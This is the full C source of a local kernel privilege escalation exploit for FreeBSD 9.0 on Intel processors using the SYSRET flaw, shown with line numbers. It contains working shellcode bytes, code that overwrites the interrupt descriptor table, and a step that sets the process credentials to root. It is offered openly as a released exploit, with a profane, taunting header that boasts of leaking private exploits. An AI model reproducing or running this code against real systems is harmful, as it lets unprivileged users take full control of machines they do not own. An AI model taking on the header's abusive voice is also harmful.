/* * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit * Author b

1. /*
2. * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit
3. * Author by CurcolHekerLink
4. *
5. * This exploit based on open source project, I can make it open source too. Right?
6. *
7. * If you blaming me for open sourcing this exploit, you can fuck your mom. Free of charge :)
8. *
9. * Credits to KEPEDEAN Corp, Barisan Sakit Hati, ora iso sepaying meneh hekerlink,
10. * Kismin perogeremer cyber team, petboylittledick, 1337 Curhat Crew and others at #MamaDedehEliteCurhatTeam
11. * if you would like next private exploit leakage, just mention @MamahhDedeh
12. *
13. * Some people may feel harmed when we release this exploit :))
14. *
15. * p.s: Met idul Adha ya besok, saatnya potong leher dewa lo... eh maksudnya potong Sapisisasi :))
16. *
17. */
18.  
19. #include <stdio.h>
20. #include <stdlib.h>
21. #include <stdint.h>
22. #include <unistd.h>
23. #include <string.h>
24. #include <sys/mman.h>
25. #include <machine/cpufunc.h>
26. #define _WANT_UCRED
27. #include <sys/proc.h>
28. #include <machine/segments.h>
29. #include <sys/param.h>
30. #include <sys/linker.h>
31. #define TRIGGERSIZE 20
32. #define BOUNCESIZE 18
33.  
34. uintptr_t Xdivp, Xdbgp, Xbptp, Xoflp, Xbndp, Xillp, Xdnap, Xfpusegmp, Xtssp, Xmissingp, Xstkp, Xprotp, Xpagep, Xfpup, Xalignp, Xmchkp, Xxmmp;
35.  
36. struct gate_descriptor * sidt()
37. {
38. struct region_descriptor idt;
39. asm ("sidt %0": "=m"(idt));
40. return (struct gate_descriptor*)idt.rd_base;
41. }
42.  
43. u_long matchsym(char *symname)
44. {
45. struct kld_sym_lookup ksym;
46. ksym.version = sizeof (ksym);
47. ksym.symname = symname;
48. if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
49. perror("kldsym");
50. exit(1);
51. }
52. return ksym.symvalue;
53. }
54.  
55. void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
56. {
57. struct gate_descriptor *ip;
58. ip = idt + idx;
59. ip->gd_looffset = func;
60. ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
61. ip->gd_ist = ist;
62. ip->gd_xx = 0;
63. ip->gd_type = typ;
64. ip->gd_dpl = dpl;
65. ip->gd_p = 1;
66. ip->gd_hioffset = func>>16;
67. }
68.  
69. void payload()
70. {
71. printf("[+] Woohoo!!!\n");
72. exit(0);
73. }
74.  
75. void resetidt()
76. {
77. struct thread *td;
78. struct ucred *cred;
79. struct gate_descriptor *idt = sidt();
80. setidt(idt, IDT_DE, Xdivp, SDT_SYSIGT, SEL_KPL, 0);
81. setidt(idt, IDT_DB, Xdbgp, SDT_SYSIGT, SEL_KPL, 0);
82. setidt(idt, IDT_BP, Xbptp, SDT_SYSIGT, SEL_KPL, 0);
83. setidt(idt, IDT_OF, Xoflp, SDT_SYSIGT, SEL_KPL, 0);
84. setidt(idt, IDT_BR, Xbndp, SDT_SYSIGT, SEL_KPL, 0);
85. setidt(idt, IDT_UD, Xillp, SDT_SYSIGT, SEL_KPL, 0);
86. setidt(idt, IDT_NM, Xdnap, SDT_SYSIGT, SEL_KPL, 0);
87. setidt(idt, IDT_FPUGP, Xfpusegmp, SDT_SYSIGT, SEL_KPL, 0);
88. setidt(idt, IDT_TS, Xtssp, SDT_SYSIGT, SEL_KPL, 0);
89. setidt(idt, IDT_NP, Xmissingp, SDT_SYSIGT, SEL_KPL, 0);
90. setidt(idt, IDT_SS, Xstkp, SDT_SYSIGT, SEL_KPL, 0);
91. setidt(idt, IDT_GP, Xprotp, SDT_SYSIGT, SEL_KPL, 0);
92. setidt(idt, IDT_PF, Xpagep, SDT_SYSIGT, SEL_KPL, 0);
93. setidt(idt, IDT_MF, Xfpup, SDT_SYSIGT, SEL_KPL, 0);
94. setidt(idt, IDT_AC, Xalignp, SDT_SYSIGT, SEL_KPL, 0);
95. setidt(idt, IDT_MC, Xmchkp, SDT_SYSIGT, SEL_KPL, 0);
96. setidt(idt, IDT_XF, Xxmmp, SDT_SYSIGT, SEL_KPL, 0);
97.  
98. asm ("mov %%gs:0, %0" : "=r"(td));
99.  
100. cred = td->td_proc->p_ucred;
101. cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
102. cred->cr_groups[0] = 0;
103.  
104. asm ("swapgs; sysretq;" :: "c"(payload));
105. }
106.  
107. void resolving()
108. {
109. Xdivp = (uintptr_t)matchsym("Xdiv");
110. Xdbgp = (uintptr_t)matchsym("Xdbg");
111. Xbptp = (uintptr_t)matchsym("Xbpt");
112. Xoflp = (uintptr_t)matchsym("Xofl");
113. Xbndp = (uintptr_t)matchsym("Xbnd");
114. Xillp = (uintptr_t)matchsym("Xill");
115. Xdnap = (uintptr_t)matchsym("Xdna");
116. Xfpusegmp = (uintptr_t)matchsym("Xfpusegm");
117. Xtssp = (uintptr_t)matchsym("Xtss");
118. Xmissingp = (uintptr_t)matchsym("Xmissing");
119. Xstkp = (uintptr_t)matchsym("Xstk");
120. Xprotp = (uintptr_t)matchsym("Xprot");
121. Xpagep = (uintptr_t)matchsym("Xpage");
122. Xfpup = (uintptr_t)matchsym("Xfpu");
123. Xalignp = (uintptr_t)matchsym("Xalign");
124. Xmchkp = (uintptr_t)matchsym("Xmchk");
125. Xxmmp = (uintptr_t)matchsym("Xxmm");
126. }
127.  
128. void trigger()
129. {
130. printf("[+] Crotz...\n");
131. uint64_t pagesize = getpagesize();
132. uint8_t * mappedarea = (uint8_t*)((1ULL << 47) - pagesize);
133. mappedarea = mmap(mappedarea, pagesize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
134. if (mappedarea == MAP_FAILED) {
135. perror("mmap (trigger)");
136. exit(1);
137. }
138.  
139. char triggerpayload[] =
140. "\xb8\x18\x00\x00\x00"
141. "\x48\x89\xe3"
142. "\x48\xbc\xef\xbe\xad\xde\xef\xbe\xad\xde"
143. "\x0f\x05";
144.  
145. uint8_t * offset_addr = mappedarea + pagesize - TRIGGERSIZE;
146. memcpy(offset_addr, triggerpayload, TRIGGERSIZE);
147.  
148. *(uint64_t*)(offset_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
149. printf("[+] Crotz...\n");
150. char bouncepayload[] =
151. "\x0f\x01\xf8"
152. "\x48\x89\xdc"
153. "\x48\xb8\xef\xbe\xad\xde\xef\xbe\xad\xde"
154. "\xff\xe0";
155.  
156. uint8_t * bouncer = (uint8_t*)(0x900000000 | (Xpagep & 0xFFFFFFFF));
157. size_t bouncer_allocsize = pagesize;
158. if ((uint8_t*)((uint64_t)bouncer & ~(pagesize-1)) + pagesize < bouncer + BOUNCESIZE)
159. bouncer_allocsize += pagesize;
160. if (mmap((void*)((uint64_t)bouncer & ~(pagesize-1)), bouncer_allocsize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
161. {
162. perror("mmap (bouncer)");
163. exit(1);
164. }
165. memcpy(bouncer, bouncepayload, BOUNCESIZE);
166. *(uint64_t*)(bouncer + 8) = (uint64_t)resetidt;
167. ((void (*)())offset_addr)();
168. }
169.  
170. int main(int argc, char *argv[])
171. {
172. printf("[+] SYSRET FUCKUP!!\n");
173. printf("[+] Start Engine...\n");
174. resolving();
175. printf("[+] Crotz...\n");
176. trigger();
177. return 0;
178. }